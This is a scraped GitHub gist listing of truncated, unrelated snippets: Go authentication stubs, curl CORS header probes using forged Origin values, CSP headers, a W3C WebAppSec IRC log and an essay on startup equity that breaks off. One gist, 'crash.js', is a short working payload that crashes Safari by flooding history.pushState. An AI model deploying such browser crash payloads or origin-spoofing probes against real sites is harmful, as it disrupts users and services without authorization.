Evan J Johnson ejcx

@ejcx
ejcx / badAuthPattern.go
Last active January 2, 2016 20:08
Go Authentication Design Patterns
package main

import (
	"log"
	"net/http"
	"os"

	"github.com/gorilla/sessions"
)
@ejcx
ejcx / goodAuthPatternAndUnauth.go
Last active January 2, 2016 23:47
Go Authentication Design Pattern
package main

import (
	"log"
	"net/http"
	"os"

	"github.com/gorilla/sessions"
)
@ejcx
ejcx / crash.js
Created January 26, 2016 01:00
Crashing Safari Payload
var total = "";
for (var i = 0; i < 100000; i++) {
    total = total + i.toString();
    history.pushState(0, 0, total);
}
root@ejjio:/var/www/breaking-sop# curl https://api.stripe.com -I
HTTP/1.1 401 Unauthorized
Server: nginx
Date: Tue, 23 Feb 2016 06:23:25 GMT
Content-Type: application/json
Content-Length: 342
Connection: keep-alive
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET, POST, HEAD, OPTIONS, DELETE
Access-Control-Allow-Origin: *
root@ejjio:/var/www/breaking-sop# curl abcnews.go.com -H "Origin: http://abcnews.go.com.ej.cx" -I
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-UA-Compatible: IE=edge,chrome=1
Content-Type: text/html;charset=utf-8
X-VG-WebCache: 164
Cache-Control: max-age=60
Content-Length: 151796
Accept-Ranges: bytes
Date: Tue, 23 Feb 2016 06:34:49 GMT
~ vagrant :) curl ruben.verborgh.org -I -H "Origin: http://ej.cx"
HTTP/1.1 200 OK
Server: nginx/1.2.0
Date: Tue, 23 Feb 2016 23:04:16 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 14887
Last-Modified: Tue, 16 Feb 2016 13:23:48 GMT
Connection: keep-alive
Vary: Accept-Encoding
Expires: Wed, 24 Feb 2016 00:04:16 GMT
root@ejjio:/var/www/breaking-sop# curl ej.cx -sI | grep Report-Only
Content-Security-Policy-Report-Only: default-src cf://*; report-uri https://ejj.io/report-uri
Content-Security-Policy-Report-Only : default-src df://*; report-uri https://test.io/report-uri
@ejcx
ejcx / onebigfavicon.go
Last active February 29, 2016 04:40
Go program that makes a webserver with an infinitely large favicon.
package main

import (
	"crypto/rand"
	"fmt"
	"log"
	"net/http"
)

func main() {
15:59 < mkwst> present+ mkwst
15:59 * mkwst might need to do that again if Zakim doesn't actually recognize the call?
15:59 < bhill2_> present+ bhill2
15:59 < bhill2_> Meeting: WebAppSec Teleconference, 23-Mar-2016
16:00 < bhill2_> Agenda: https://lists.w3.org/Archives/Public/public-webappsec/2016Mar/0073.html
16:00 < bhill2_> Chairs: bhill2, dveditz
16:00 < freddyb> present+ freddyb
16:00 -!- bhill2 [~bhill2@public.cloak] has quit [Ping timeout: 180 seconds]
16:00 -!- gmaone [~chatzilla@public.cloak] has joined #webappsec
16:01 -!- teddink [~teddink@public.cloak] has joined #webappsec
@ejcx
ejcx / company-ownership.md
Created July 5, 2016 17:25 — forked from jdmaturen/company-ownership.md
Who pays when startup employees keep their equity?

JD Maturen, 2016/07/05, San Francisco, CA

As has been much discussed, stock options as used today are not a practical or reliable way of compensating employees of fast-growing startups. With an often high strike price, a large tax burden on execution due to AMT, and a 90-day execution window after leaving the company, many share options are left unexecuted.

There have been a variety of proposed modifications to how equity is distributed to address these issues for individual employees. However, there hasn't been much discussion of how these modifications will change the overall ownership dynamics of startups. In this post we'll dive into the situation as it stands today, where there is very nearly 100% equity loss when employees leave companies pre-exit, and then we'll look at what would happen if there were instead a 0% loss rate.

What we'll see is that employees gain nearly 3-fold, while both founders and investors – particularly early investors – get dilute